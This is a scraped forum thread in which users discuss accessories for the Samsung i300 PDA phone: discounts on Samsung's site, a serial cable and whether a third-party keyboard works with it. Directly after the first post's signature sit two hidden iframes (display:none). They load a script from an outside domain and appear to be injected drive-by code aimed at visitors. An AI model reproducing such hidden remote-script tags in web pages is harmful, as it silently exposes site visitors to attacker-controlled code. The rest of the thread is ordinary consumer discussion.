+ Reply to Thread

Accessories available at sprintpcs

Not sure if anyone has made any comment about this yet, but I just noticed that Sprint PCS is now offering accessories for the i300. fyi

-gary<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

If you are referring to the cradle and extended batteries and such we are aware. I am waiting for Samsung to produce some toys for my baby. Can't wait for that keyboard they keep telling me is on its way.

On a similar note, if you go to samsungusa.com and go to phones, I300, and then accessories, a screen should pop up offering 10% for completing a very small survey. Brings that extended battery or hot sync cable down quite a bit.

Actually 20% off

On Samsunusa.com, If you go to "Accessories home" from the accessories page, you are offered to register your phone and get 20% off accessories for your phone.

--Gaurav

Thanks ler. I pleasantly stand corrected.

One thing though; there's no description of the accessories on samsung's site - anyone know of a different site with descriptions?

-mark
    PS - there's a serial cable that'll work with this pda NOW - it's kinda big though; would be nice to get a smaller one; it's at http://www.ibizcorp.com/pda_accessor...a_keysync.html

Originally posted by mjorange
    If you are referring to the cradle and extended batteries and such we are aware. I am waiting for Samsung to produce some toys for my baby. Can't wait for that keyboard they keep telling me is on its way.

On a similar note, if you go to samsungusa.com and go to phones, I300, and then accessories, a screen should pop up offering 10% for completing a very small survey. Brings that extended battery or hot sync cable down quite a bit.

Administrator

Arrow

there is a samsung serial cable already on the site// am i missing something?

the link you posted is of the ibiz keyboard.... do you huave this and have you connected it to the i300?

At sprintpcs.com go to phones, I300, then accessories available for detailed summary.

Originally posted by Marctronixx
    there is a samsung serial cable already on the site// am i missing something?

the link you posted is of the ibiz keyboard.... do you huave this and have you connected it to the i300?
    I haven't gotten it yet, but I'm considering it. You should be able to plug this keyboard directly into the i300's serial/docking cable.

-mark

I bought the keyboard, tried it out, and then returned it because it didn't work with the I300. I tried troubleshooting everything except for one thing: I didn't try using the Handspring Visor driver. If you want to give that driver a try with your I300 and the keyboard, please post your results. I'd be most interested in them.

Administrator

Arrow

so he was tlaking about the keyboard and not a serial cable.. (im lost)...

i heard that that particular board did not work with the i300... it barely works for the 6035...